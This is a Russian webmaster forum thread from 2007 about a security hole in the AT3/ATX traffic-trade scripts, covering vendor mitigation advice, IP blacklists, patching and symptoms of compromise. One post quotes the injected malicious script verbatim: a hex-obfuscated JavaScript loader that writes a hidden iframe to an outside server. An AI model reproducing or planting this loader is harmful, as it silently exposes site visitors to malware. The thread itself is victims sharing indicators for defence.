Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
CJs
»
Тема:
Новая дыра в АTL
Новая тема
Ответить
цитата
07/12/07 в 20:56
Nick Cave
[Virus] уже написал в хитботчиках, но может не все заметили:
Список хитботчиков 4
Сегодня в заголовке АТЛ (на входе в админку) появилась новость о
найденой дырке и рекомендация закрыть x2.cgi в htaccess-e от
доступа с других ИП.
Обещают выпустить апдейт в ближайшем времени.
Правда на сайте arrowscripts чето пока этой новости я не нашел.
цитата
07/12/07 в 22:05
Kitaa
Вот еще;
http://www.askdamagex.com/t21776-we-need-to-talk-security-now.html
Походу очень много народу пострадало.
цитата
07/12/07 в 22:55
Benny
блин ну че за криворукие программеры!
в атх трейд по групам 3 месяц делают, да еще и дыры постоянно появляются!
продам 2 копии атх
зы: не, пока не буду продавать..
цитата
08/12/07 в 00:00
Ziegfrid
А симптоматика то какая? На что внимание обратить?
Последний раз редактировалось: Ziegfrid (
08/12/07 в 00:20
), всего редактировалось 1 раз
цитата
08/12/07 в 00:13
X-dream
Цитата:
A security issue has been detected and fixed, new build is on its way.
In the mean time, use htaccess to limit access to the file
cgi-bin/at3/x/x2.cgi to only your IP and blacklist IPs 208.53.158.26 and 69.93.211.234
пи*дец, вот они зае*али... опять надо будет все скрипты обновлять
цитата
08/12/07 в 00:16
Benny
ладно ат3, он фришный..
но пилять, атх, купить за 400баков и там трейд по групам не работает - это пипец..
зы: в атх тоже дыру нашли
цитата
08/12/07 в 01:03
Kitaa
Ziegfrid писал:
А симптоматика то какая? На что внимание обратить?
Он троя весит такого
Код:
<script> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>
и еще создает файл backup.php пустой.
Я вчера эту гадость у себя находил.
p.s. думаю трейд скрипт надо другой ставить какой посоветуете АТС?
цитата
08/12/07 в 01:18
Ziegfrid
Kitaa писал:
p.s. думаю трейд скрипт надо другой ставить какой посоветуете АТС?
АТС смысла нет ставить. Скоро появится 1.7 версия. Щас активно тестируется. Вот поэтому пока ставлю ФТТ. Кстати пока скрипт показал себя с хорошей стороны (да и после ат3 очень легко с ним, потому как много похожего, хотя есть еще некоторые полезные вещи). Но все равно жду 1.7 АТС.
цитата
08/12/07 в 01:35
awm_mark
нахрен снес ат3 со всех сиджев, недавно
цитата
08/12/07 в 01:36
Ziegfrid
awm_mark писал:
нахрен снес ат3 со всех сиджев, недавно
Оффтопик:
Что поставил?
цитата
08/12/07 в 01:41
Benny
хм.. backup.php пустой находил в корне домена, а вот троя нет вроде нигде. куда они его вешают? на морду или в топ?
может спасло то, что доступ к фтп закрыт у меня..
цитата
08/12/07 в 02:02
Kitaa
У меня по вешали на темплейт, на страничку для линк трейда и на фрихи которые были на данных сайтах. Судя по логам фтп к нему не прикосались.
p.s. права на темплейт какие стоят? может если 444 то это спасло.
цитата
08/12/07 в 02:09
Benny
может через SSH?
он уменя тоже закрыт.
цитата
08/12/07 в 04:09
awm_mark
чаще всего вешается когда на вирте хост (ну или для дедика доступ к 1 фтп достаточно, межсайтовый скр пропускаю, не поймут тут)
просто некоторые скрипты требуют установки 777 на корень, при этом вы открываете доступ к своим страницам любому желающему
цитата
08/12/07 в 12:59
Stek
насколько понимаю, эта дыра только если скрипт может писать в директорию вэб сайта.
цитата
08/12/07 в 17:01
Teval
мне в темллейт топлиста ат3 вешали
цитата
08/12/07 в 18:45
supphosting.com
Писать можно во все файлы/папки где это разрешено пользователю от которых выполняется cgi-bin.
цитата
08/12/07 в 19:29
sonata
awm_mark писал:
нахрен снес ат3 со всех сиджев, недавно
После того как увидел, что разработчик не залатав дыру в текущем стал делать очередную новогоднюю версию со скидками - думаю что тоже буду сносить.
цитата
08/12/07 в 20:13
Figura
16 билд уже готов. Идем качать
цитата
08/12/07 в 20:36
bullet2
Какие файлы дистрибутива надо переписать поверх старых, чтобы не затереть базу трейдеров и топлистов, и втоже время все работало?
цитата
08/12/07 в 20:47
Figura
там патч скачай, и сверху его заливай, ниче не сотрется
цитата
09/12/07 в 00:02
kazantipman
опасна ли дыра если формы закрыты?
цитата
09/12/07 в 00:07
Benny
когда появился backup.php в корне, все формы были закрыты.
поэтому палагаю, что опасно.
цитата
09/12/07 в 02:00
allendale
я хоть и не пострадал (у меня /x/ доступна только по http auth), но всё равно обиделся и пошёл купил 10 версий tradeexpert. во первых дешевле, во вторых надеюсь он менее распространён и будет меньше дыр находиться...
цитата
09/12/07 в 02:01
Danilax
во а я тогда на смарт подумал, месяц 2 назад тоже ламанули, так вот бекап в корне был для отвода глаз, ищи еще один, скорее всего он будет в ротаторе в бекап папке или где то там
Стр.
1
,
2
,
3
>
последняя »
Новая тема
Ответить
Эта страница в полной версии